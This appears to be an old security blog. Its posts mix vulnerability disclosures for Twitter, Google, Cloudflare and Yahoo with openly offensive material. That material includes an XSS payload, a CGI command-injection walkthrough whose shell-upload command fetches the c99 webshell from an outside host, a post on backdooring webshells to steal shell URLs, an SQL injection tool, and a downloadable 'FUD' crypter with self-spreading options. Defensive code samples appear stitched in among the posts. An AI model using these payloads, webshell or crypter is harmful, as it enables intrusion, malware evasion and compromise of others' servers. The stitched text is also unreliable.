FatCat Auto SQL Injector

January 10, 2012

FatCat is an automatic SQL injection tool for testing your web application and exploiting it more deeply. Its features help you extract database, table, and column information from a web application, provided the application is vulnerable to MySQL SQL injection.

FatCat has a user-friendly GUI; it automatically detects the SQL injection vulnerability and starts exploiting it.

Features

1) Normal SQL Injection
2) Double Query SQL Injection

In Next Version

1) WAF bypass
2) Cookie header passing
3) Load File
4) Generating XSS from SQL

Requirement

1) PHP Version 5.3.0
2) Enable file_get_function

Print Screen 

[Screenshot: fatcat.jpg]

Download

http://code.google.com/p/fatcat-sql-injector/downloads/list

Video

http://dl.dropbox.com/u/18007092/FatCat.swf

We Provide Penetration Testing

Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection

January 5, 2012

————————
0x1 Title: Twitter [Mobile] Account Settings Cross Site Scripting and Multiple HTML Injection Vulnerability
0x2 Script Link: https://mobile.twitter.com/settings
0x3 Author: Sandeep Kamble
0x4 Reported: December 28, 2011
0x5 Vulnerability Fix Date: Jan 05, 2012
0x6 Public Release: Jan 05, 2012
0x7 Browser: Firefox, IE
0x8 OS: Win7, Ubuntu
————————

Description of script:

Twitter provides features to protect user privacy: from the account settings you can protect your Tweets, change your username, change your password, and change your e-mail address.

Affected script URL:

URL #1: https://mobile.twitter.com/settings/screen_name
URL #2: https://mobile.twitter.com/settings/name

Vulnerability Description:

1) Cross-Site Scripting Vulnerability (Twitter mobile was affected by user-side XSS, although it was protected against clickjacking):

A cross-site scripting attack is a type of injection in which malicious JavaScript is injected into a web site's dynamic pages.

2) HTML Injection Vulnerability (Twitter mobile was affected on the user side; one HTML injection was stored):

HTML injection is a type of injection in which malicious HTML code is injected into a web site's pages.

Exploit Description + Proof of Concept:

URL #1: https://mobile.twitter.com/settings/name

Title #1: Stored HTML Injection Vulnerability

In the above URL there is one input box to change the name. The HTML code of the input box is as follows.

Image1

Twitter allows only 20 characters in the name field.
If we try to inject malicious HTML code, the code looks as follows:

HTML Code : ">sandeep

Image2

The malicious HTML code executed successfully, matching the syntax of the input box. The following shows the output of executing the code above.

image4

URL #2: https://mobile.twitter.com/settings/name
Title #2: Cross Site Scripting and HTML Injection Vulnerability

In the above URL there is one input box to change the user name. The HTML code of the input box is as follows.

image7

In this input box we can execute JavaScript as well as HTML code, so it is vulnerable to both cross-site scripting and HTML code injection.

JS : "><script>alert(document.domain)</script>

image9

The malicious JavaScript executed successfully, matching the syntax of the input box. The following shows the output of executing the code above.

image100

Similarly, we can execute HTML code here, but this HTML injection is not stored.

image5

Check Out Video Here

http://dl.dropbox.com/u/18007092/twitter.swf

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short, perform input sanitization
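The two countermeasures above, worked through as an added example (this is not Twitter's code or the post's own, and the markup of the name field is assumed): the vulnerable pattern splices the submitted name straight into the value attribute, the hardened one enforces the 20-character limit server-side and HTML-encodes for attribute context, and the checks show how to tell the two apart by looking at what the browser's parser would actually see.

```python
import html
from html.parser import HTMLParser

# Twitter's mobile name field accepts 20 characters, per the post above.
NAME_MAXLEN = 20

# The probe string the post used against the screen-name field.
XSS_PROBE = '"><script>alert(document.domain)</script>'


def render_name_field_unsafe(name):
    """Vulnerable pattern (assumed markup): the submitted value is spliced into the
    attribute verbatim, so a leading double quote closes the attribute and the
    following '>' closes the <input> element."""
    return '<input type="text" name="name" value="%s">' % name


def render_name_field_safe(name):
    """Hardened pattern: enforce the length limit on the server (a client-side
    maxlength is not a control), then HTML-encode for the attribute context so
    quotes and angle brackets cannot terminate the attribute or the element."""
    name = name[:NAME_MAXLEN]
    return '<input type="text" name="name" value="%s">' % html.escape(name, quote=True)


class _StartTagCollector(HTMLParser):
    """Records every start tag a browser-side parser would see in the output."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(rendered):
    """Countermeasure check 1, structural form: parse the rendered markup and list
    its start tags. Anything beyond the single <input> means the submitted value
    escaped the attribute and became markup."""
    collector = _StartTagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags


def output_echoes_raw_input(rendered, submitted):
    """Countermeasure check 1, textual form: the input parameter appears verbatim
    in the HTML output although it carries characters that are special in HTML."""
    return any(c in submitted for c in '<>"\'') and submitted in rendered


if __name__ == "__main__":
    for label, render in (("unsafe", render_name_field_unsafe), ("safe", render_name_field_safe)):
        out = render(XSS_PROBE)
        print(label, start_tags(out), output_echoes_raw_input(out, XSS_PROBE))
```

The structural check is the more reliable of the two: a filter that merely strips the word "script" still fails it, because any second start tag (an <img> or <svg> with an event handler, for instance) shows the value escaped the attribute.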


Warm Regards,
Sandeep Kamble
www.sandeepkamble.com


Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)

December 20, 2011

#Title: Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)
#Author: Sandeep Kamble
#Risk Factor: Low (why low: please read below)
#Attack Type: User A can access user B's account link to remove the secondary e-mail address
#Reported Date: Oct 21, 2011

Overview:

On the Google account settings page, when you reset your Google account password, Google sends a reset-password link to your secondary email address. That mail contains one more link, which can be used to remove your secondary email address.

Vulnerability Description:

This vulnerability can be used to remove a secondary email address. To access any user's account link that removes the secondary email address, we would need to guess the ?c token. The ?c token is generated on the server side, so it is not possible to guess it, and the removal can therefore only be performed from the victim's side (self-exploitation).

Vulnerable Link

The link offers two options: one removes the secondary email address and the other cancels the removal operation.
The link is accessible to everyone. We cannot generate the token ourselves, but we can find tokens using the following

Google Dork: inurl:/AccountDisavow?c=

If you click on the radio button "No, I didn't create *******@gmail.com – remove my email address, ********@yahoo.com, from this Google Account." and then click Continue, it will remove the email address and delete the link token.
The link will then be dead; no one can access it again!

But if you click on "Yes, *******@gmail.com is my Google Account." and press Continue,
the token is not deleted, so those pages may end up indexed by Google.
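The behaviour the post describes comes down to a token that is consumed on one branch of the page but not the other. The following added example (not Google's code; the token format, lifetime and response headers are assumptions for illustration) shows the single-use handling that closes that gap: the token is popped from the store before the answer is even examined, so a "Yes" link dies just as a "No" link does, and a leaked or indexed link cannot be replayed.

```python
import secrets
import time

# Assumed flow (not Google's implementation): a recovery mail carries a link with
# a random token; the page behind it offers "Yes, this is my account" and
# "No, remove my secondary address". The post reports that only the "No" path
# invalidated the token, so "Yes" links stayed live and could be indexed.

TOKEN_TTL_SECONDS = 24 * 60 * 60  # assumed lifetime; the real value is not on the page
VALID_ANSWERS = ("yes", "no")


class DisavowTokenStore:
    """Single-use disavow tokens: consumed on either answer, and expired by time."""

    def __init__(self, now=time.time):
        self._now = now           # injectable clock so expiry can be tested
        self._tokens = {}         # token -> (account, secondary_email, expires_at)
        self.accounts = {}        # account -> secondary email currently on file

    def issue(self, account, secondary_email):
        """Record the secondary address and hand back a fresh token for the mail."""
        self.accounts[account] = secondary_email
        token = secrets.token_urlsafe(32)  # 256 random bits: not guessable, not enumerable
        self._tokens[token] = (account, secondary_email, self._now() + TOKEN_TTL_SECONDS)
        return token

    def resolve(self, token, answer):
        """Handle the Continue button. Returns 'kept', 'removed', 'expired',
        'invalid' (unknown or already used token) or 'bad-request'."""
        if answer not in VALID_ANSWERS:
            return "bad-request"      # malformed input does not burn the token
        record = self._tokens.pop(token, None)   # pop first: the link dies whatever the answer
        if record is None:
            return "invalid"
        account, secondary_email, expires_at = record
        if self._now() > expires_at:
            return "expired"
        if answer == "no":
            # Only remove the address the mail was actually about, in case it changed since.
            if self.accounts.get(account) == secondary_email:
                del self.accounts[account]
            return "removed"
        return "kept"


def response_headers():
    """Headers for the disavow page so that a live link is neither cached nor
    indexed if it leaks (standard HTTP and robots directives)."""
    return {
        "Cache-Control": "no-store",
        "X-Robots-Tag": "noindex, nofollow",
        "Referrer-Policy": "no-referrer",
    }


if __name__ == "__main__":
    store = DisavowTokenStore()
    t = store.issue("alice", "alice@example.invalid")
    print(store.resolve(t, "yes"), store.resolve(t, "yes"))  # second call is rejected
```

Popping before branching is the whole fix; the headers are belt and braces for the case where a still-valid link is opened from a mail client that prefetches or a crawler that follows it.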

Proof of Concept

POC 1

POC 2

Finally, I got awarded by Google.

Google Hall of Fame

Special thanks to Amol Naik, Anil, Veenu bhai

Warm Regards

Sandeep Kamble
www.sandeepkamble.com


Make BackDoored WebShell

October 17, 2011

Sup,
I have made one very small PHP script to steal shell URLs (a backdoored web-shell).
To steal the shell URL you need to paste one JavaScript line into the webshell.

For example, I have backdoored this web-shell:

http://pastebin.com/naKpYfzV

Download Script :

http://dl.dropbox.com/u/18007092/bc.zip

/Sandeep Kamble


http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability

0x1 Site: http://anti-virus.cloudflare.com
0x3 Author: Sandeep Kamble
0x4 Reported: October 12, 2011
0x6 Public Release: October 17, 2011
0x7 Status: Fixed

Description :

Anti-virus.cloudflare.com is a service for avoiding spam.
The project aims to stop attacks and to educate visitors with infected computers about how they can clean up their machines.

Affected Variable :
?b_src=

Exploit :
JavaScript can be executed through the vulnerable variable ?b_src=. This attack is commonly known as Cross Site Scripting (XSS).
The affected script on anti-virus.cloudflare.com had a stored XSS flaw, which could be used for grabbing cookies.

POC :

Screen Shot :

Cloud XSS


Countermeasure :

1) Determine whether HTML output includes input parameters
2) In short, perform input sanitization

Conclusion

I would like to thank the Cloudflare Security Team for their quick responses to my reports.


Get Real IP Address Behind Cloudflare | Made by : ev1lut10n

October 8, 2011

A new web-based tool to get the IP address behind Cloudflare's DNS proxy.

Link http://teksan-tekstroy.com/cloudflare

(forbidden domain : jasaplus.com ,gaharu-2.net,gaharuindah-2.net,devilzc0de.org)

Target using cloudflare..please wait…searching real ip address…

got valid IP v4 address

[+] Checking port 80 on possible real ip address wheter it’s open or not

open port:80 on : 67.23.70.62

[+] W00t got possible real ip behind cloudflare : 67.23.70.62


RCE to shell upload [CGI]

September 27, 2011

Author: Sandeep Kamble
Released Date: September 9, 2010

Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept information passed from the client as a replacement for the specified target.

Vulnerabilities:-

1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.

Example site:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995

Exploit:-
The front-end interface to a CGI program is an HTML document called a form. Forms include the HTML tag "Input". Each "Input" tag has a variable name associated with it. This is the variable name that forms the left-hand side of the previously mentioned variable=value token. The contents of the variable form the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the "Input" field. However, if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the "Input" data will pass the data directly to the interpreter.

Example:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|

Shell upload command:-

http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|

Shell:-

http://www.victim.com/newswire/uploadedimage.php

Conclusion:-

The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.

After the shell upload you can try for more. I hope you find it useful; be safe!
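The write-up's own conclusion is that the root cause is the article parameter reaching the interpreter unvalidated. As an added example (not the post's code, and the CGI it describes is not shown on the page; the article directory and the log lines are constructed for illustration), this shows the two defensive halves of that lesson: an allowlist for the parameter that turns the `|pwd|` probe into a rejected request rather than a command, and a scan over access-log lines that flags the same probe and the follow-up download attempt after URL decoding.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Allowlist for the article parameter: the page's own example id is two runs of
# digits joined by a single dot, so that is the entire accepted grammar.
ARTICLE_ID_RE = re.compile(r"[0-9]{1,20}\.[0-9]{1,20}")
# Characters with meaning to a shell or to a pipe-style open(); a validated id
# never contains any of them, so their presence in a request is itself a signal.
SHELL_META = set("|;&`$<>()\n\r")
COMMAND_WORDS = re.compile(r"\b(wget|curl|nc|sh|bash|perl|mv|chmod)\b")

ARTICLE_DIR = "/var/www/newswire/articles"  # assumed storage path for the example


def validate_article_id(value):
    """True only for ids that match the allowlist exactly."""
    return ARTICLE_ID_RE.fullmatch(value) is not None


def article_path(value):
    """Build the file path from a validated id only, and confirm the result still
    lies under ARTICLE_DIR. The id is never handed to a shell."""
    if not validate_article_id(value):
        raise ValueError("rejected article id")
    path = os.path.normpath(os.path.join(ARTICLE_DIR, value + ".txt"))
    if os.path.commonpath([ARTICLE_DIR, path]) != ARTICLE_DIR:
        raise ValueError("path escapes article directory")
    return path


def suspicious_params(query_string):
    """Flag query parameters carrying shell metacharacters or command names,
    checked after URL decoding so %7C and %20 do not hide anything."""
    findings = []
    for param, values in parse_qs(query_string, keep_blank_values=True).items():
        for v in values:
            if SHELL_META & set(v):
                findings.append((param, "shell metacharacter"))
            elif COMMAND_WORDS.search(v):
                findings.append((param, "command name"))
    return findings


# Constructed access-log lines (combined log format) modelled on the post's URLs;
# the download host is a placeholder, not a real server.
ACCESS_LOG = [
    '203.0.113.5 - - [27/Sep/2011:10:00:01 +0000] "GET /newswire/newsaction.cgi?article=999999998473.992039800995 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [27/Sep/2011:10:00:07 +0000] "GET /newswire/newsaction.cgi?article=999999998473.992039800995|pwd| HTTP/1.1" 200 412',
    '203.0.113.5 - - [27/Sep/2011:10:00:19 +0000] "GET /newswire/newsaction.cgi?article=999999998473.992039800995%7Cwget%20http://attacker.example/c99.txt;mv%20c99.txt%20uploadedimage.php%7C HTTP/1.1" 200 1088',
    '198.51.100.9 - - [27/Sep/2011:10:01:02 +0000] "GET /newswire/uploadedimage.php HTTP/1.1" 200 23040',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_access_log(lines):
    """Return (decoded request target, findings) for every line whose query
    string carries an injected parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        findings = suspicious_params(urlsplit(target).query)
        if findings:
            hits.append((unquote(target), findings))
    return hits


if __name__ == "__main__":
    for target, findings in scan_access_log(ACCESS_LOG):
        print(target, findings)
```

The fourth log line (the request for the freshly written .php file) carries no query string and so is not flagged here; in practice a request for a new script in a directory that should hold no scripts, seconds after a flagged request from the same source, is the second half of the same pattern and worth an alert of its own.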


XCrypt & USG 1.3 [FUD]

September 25, 2011

This is a crypter with Universal Stub Generator 1.3; the USG is written in VB.NET.
It has spread options (P2P, USB and Startup),
file clone, icon and file info, and then the other PE options you see listed, like add section, strip relocations, change entry point, etc.

Make Your Stuff FUD

http://dl.dropbox.com/u/18007092/XCrypt%20%26%20USG%201.3.rar


Yahoo.Com Reset Page Wicked Behavior

September 15, 2011
Page: https://edit.india.yahoo.com/forgot
Risk Factor: Minor

Once, I was just playing with the Yahoo reset page and I found one interesting thing there. The password reset steps could be skipped; I was successful in skipping one step and found some interesting behavior on entering different characters. Here is what you have to do to observe it:

1] Go to URL: https://edit.india.yahoo.com/forgot
2] In the My Yahoo ID textbox enter this: "s
3] You will be passed to the next step => Please select an option to reset your password.

Similarly, if you enter the following in the text box you'll find some interesting things:
1) "1    =>  Page will ask you for B'day, Country of Residence and Postal Code
2) "12   =>  It will change the Yahoo page language
3) "123  =>  It will change the Yahoo page language to Korean

After discussing with some friends I found that it may be a database default value which is used by programmers for testing purposes.

Peace
Sandeep Kamble

www.subhashdasyam.com

He is the writer of an online anti-virus scanner. He has developed various tools and scripts.

More Details

http://www.subhashdasyam.com/p/online-antivirus-scanner.html
